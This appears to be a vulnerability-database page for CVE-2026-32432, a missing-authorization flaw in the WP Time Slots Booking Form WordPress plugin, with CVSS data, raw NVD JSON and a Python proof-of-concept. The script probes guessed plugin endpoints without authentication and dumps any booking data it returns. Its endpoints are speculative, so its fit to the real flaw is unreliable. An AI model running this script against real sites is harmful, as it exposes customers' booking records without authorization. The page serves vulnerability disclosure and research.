Security Vulnerability Report
中文
CVE-2026-32432 CVSS 5.3 MEDIUM

CVE-2026-32432

Published: 2026-03-13 19:55:03
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.42.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Time Slots Booking Form <= 1.2.42

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32432 PoC - Missing Authorization in WP Time Slots Booking Form # Target: WordPress site with WP Time Slots Booking Form plugin <= 1.2.42 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-32432 This checks for missing authorization in booking management endpoints """ # Common plugin endpoints that might be affected endpoints = [ "/wp-json/wp-time-slots/v1/bookings", "/wp-json/wp-time-slots/v1/slots", "/wp-admin/admin-ajax.php?action=get_time_slots", "/wp-admin/admin-ajax.php?action=manage_bookings" ] for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" try: # Send request without authentication response = requests.get(url, timeout=10) # Check if we get a successful response without auth if response.status_code == 200: print(f"[+] Potential vulnerability at: {url}") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Endpoint {endpoint} returned: {response.status_code}") except requests.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") return False def exploit_unauthorized_access(): """ Exploit CVE-2026-32432 to access booking data without authorization """ # Try to access booking list without authentication url = f"{TARGET_URL}/wp-json/wp-time-slots/v1/bookings" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[+] Successfully accessed booking data without authorization!") print(f"[+] Data: {response.text}") return response.json() else: print(f"[-] Access denied or endpoint not found: {response.status_code}") return None except Exception as e: print(f"[!] Exploitation failed: {e}") return None if __name__ == "__main__": print("CVE-2026-32432 WP Time Slots Booking Form PoC") print("=" * 50) check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32432", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:02.657", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.42."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en codepeople WP Time Slots Booking Form wp-time-slots-booking-form permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a WP Time Slots Booking Form: desde n/a hasta &lt;= 1.2.42."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-time-slots-booking-form/vulnerability/wordpress-wp-time-slots-booking-form-plugin-1-2-42-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}